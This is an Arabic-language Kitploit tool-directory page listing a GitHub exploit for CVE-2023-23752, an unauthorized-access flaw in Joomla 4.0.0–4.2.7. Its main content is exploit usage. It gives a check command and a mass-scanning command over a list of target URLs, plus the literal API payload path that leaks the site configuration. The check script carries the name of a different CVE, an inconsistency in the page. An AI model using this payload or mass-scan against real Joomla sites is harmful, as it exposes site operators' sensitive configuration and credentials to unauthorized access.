Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2023-23752 | Kitploit
أدوات/GitHubGitHub/ytxzx/cve-2023-23752
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتاختبار الاختراق
GitHubytxzx/cve-2023-23752

CVE-2023-23752

عرض المستودع
منذ 2 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2023-23752 - إعادة إنتاج ثغرة الوصول غير المصرح به في Joomla

استخدام السكربت

تثبيت مكتبات بايثون

pip install -r requirements.txt

التحقق من الثغرة

python3 CVE-2022-26134_check.py -u url -c whoami

image

المسح الجماعي

python3 CVE-2023-23752.py -f url_part.txt

image

الإصدارات المتأثرة

4.0.0 <= Joomla <= 4.2.7

إعادة إنتاج الثغرة

payload:

/api/index.php/v1/config/application?public=true

قم بالوصول إلى عنوان الثغرة، والتقط الحزم، وأعد إرسالها

image

مبدأ الثغرة

في الإصدارات من 4.0.0 إلى 4.2.7 من Joomla! CMS، ونظرًا لعدم كفاية تقييد الوصول إلى نقاط نهاية خدمة الويب، قد يؤدي ذلك إلى وصول غير مصرح به إلى REST API، مما يتسبب في تسريب معلومات حساسة.

تنزيل الأداة